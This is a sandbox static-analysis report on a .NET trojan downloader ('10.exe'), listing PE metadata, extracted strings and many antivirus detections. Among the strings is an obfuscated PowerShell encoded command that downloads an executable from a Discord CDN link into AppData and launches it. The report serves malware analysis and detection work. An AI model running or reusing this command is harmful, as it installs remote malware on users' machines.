Static | ZeroBOX

PE Compile Time

2023-03-14 03:52:24

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x00000bc4 0x00000c00 3.90262212155
.rsrc 0x00004000 0x00000570 0x00000600 4.19505825562
.reloc 0x00006000 0x0000000c 0x00000200 0.0815394123432

Resources

Name Offset Size Language Sub-language File type
RT_VERSION 0x000040a0 0x00000234 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x000042d8 0x00000296 LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, ASCII text

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
<Module>
10.exe
aieccxpxvqqhruwjcanxvfwagjt
mscorlib
System
Object
System.Runtime.CompilerServices
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
System.Diagnostics
ProcessStartInfo
set_FileName
set_Arguments
ProcessWindowStyle
set_WindowStyle
set_CreateNoWindow
Process
WrapNonExceptionThrows
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="utf-8" ?>
<asmv1:assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<assemblyIdentity version="1.8.6.3" name="dpxeujfrylyzbfgzvauts" />
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
</asmv1:assembly>
powershell
-EncodedCommand "PAAjAHkAbQBrACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAOAA0ADkAMQAwADEAOQA3ADcAMQA5ADQANAA5ADcAMwAzAC8AMQAwADgANAA5ADEAMQAwADMAMAAwADcAOQAwADcANAA0ADQANgAvAGwAaQBsAGkAYQBuAGQAbwByAGsAZQByAC4AZQB4AGUAJwAsACAAPAAjAG0AagBnACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZABrAGYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZABwAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAwAC4AZQB4AGUAJwApACkAPAAjAHcAYgBkACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGsAcAB6ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBoAGEAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAxADAALgBlAHgAZQAnACkAPAAjAGsAcQByACMAPgA="
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
0.0.0.0
InternalName
10.exe
LegalCopyright
OriginalFilename
10.exe
ProductVersion
0.0.0.0
Assembly Version
0.0.0.0
Antivirus Signature
Bkav W32.AIDetectNet.01
Lionic Clean
tehtris Clean
DrWeb Clean
MicroWorld-eScan Gen:Variant.Barys.382335
ClamAV Clean
FireEye Generic.mg.ae120eba5b9a92de
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Trojan.Agent.PGen
VIPRE Gen:Variant.Barys.382335
Sangfor Clean
CrowdStrike win/malicious_confidence_90% (D)
BitDefender Gen:Variant.Barys.382335
K7GW Clean
K7AntiVirus Clean
BitDefenderTheta Gen:NN.ZemsilF.36344.am0@aSy7lLp
VirIT Clean
Cyren W32/MSIL_Agent.DIE.gen!Eldorado
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of MSIL/TrojanDownloader.Agent.MAE
APEX Malicious
Paloalto Clean
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan-Downloader.MSIL.PsDownload.gen
Alibaba Clean
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
TACHYON Clean
Sophos Clean
F-Secure Clean
Baidu Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Trojan-FUTR!AE120EBA5B9A
Trapmine suspicious.low.ml.score
CMC Clean
Emsisoft Gen:Variant.Barys.382335 (B)
SentinelOne Static AI - Malicious PE
GData Gen:Variant.Barys.382335
Jiangmin Clean
Webroot Clean
Avira HEUR/AGEN.1235039
Antiy-AVL Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.Barys.D5D57F
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Trojan:MSIL/AsyncRat.NEAG!MTB
Google Detected
AhnLab-V3 Trojan/Win.Generic.C5148890
Acronis Clean
VBA32 Clean
ALYac Gen:Variant.Barys.382335
MAX malware (ai score=85)
Cylance unsafe
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Tencent Clean
Yandex Clean
Ikarus Trojan.MSIL.CoinMiner
MaxSecure Trojan.Malware.121218.susgen
Fortinet MSIL/Agent.MAE!tr
AVG MSIL:Downloader-PB [Trj]
Avast MSIL:Downloader-PB [Trj]
No IRMA results available.